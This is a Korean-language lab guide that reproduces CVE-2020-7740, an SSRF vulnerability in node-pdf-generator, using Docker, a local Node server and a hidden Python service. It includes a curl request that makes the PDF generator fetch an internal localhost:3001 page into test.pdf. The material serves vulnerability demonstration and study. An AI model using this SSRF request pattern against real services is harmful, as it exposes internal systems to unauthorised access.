
CVE-2020-7740의 예시
이 문제는 node-pdf-generator 패키지의 모든 버전에 영향을 미칩니다.
node-pdf-generator에 제공되는 콘텐츠에 대한 사용자 입력 검증 및 살균(sanitization)이 부족하기 때문에, 공격자가 악성 URL을 조작하여 외부 서버로 전달되도록 함으로써 SSRF 공격을 가능하게 할 수 있습니다.
docker run -p 3000:3000 cve-2020-7740 명령어로 컨테이너를 실행합니다.localhost:3001에 직접 접속할 수 없다는 점에 유의하세요.curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf 명령어를 사용하여 curl 요청을 보냅니다.test.pdf 파일을 열어 숨겨진 localhost 웹사이트를 확인합니다.git clone {추가될 링크} 명령어로 프로젝트를 클론합니다.https://wkhtmltopdf.org/에서 의존성을 설치합니다.node .\NodePdfGeneratorServer 명령어로 서버를 시작합니다. 서버는 localhost:3000에서 실행됩니다.python3 -m pip install -r requirements.txt 명령어로 숨겨진 Python 서버의 요구 사항을 설치합니다.python3 HiddenService 명령어로 숨겨진 서버를 시작합니다. 서버는 'localhost:3001`에서 실행됩니다.curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf 명령어로 보낼 수 있습니다.http://www.google.com HTML 페이지의 복사본이 test.pdf 파일로 저장됩니다.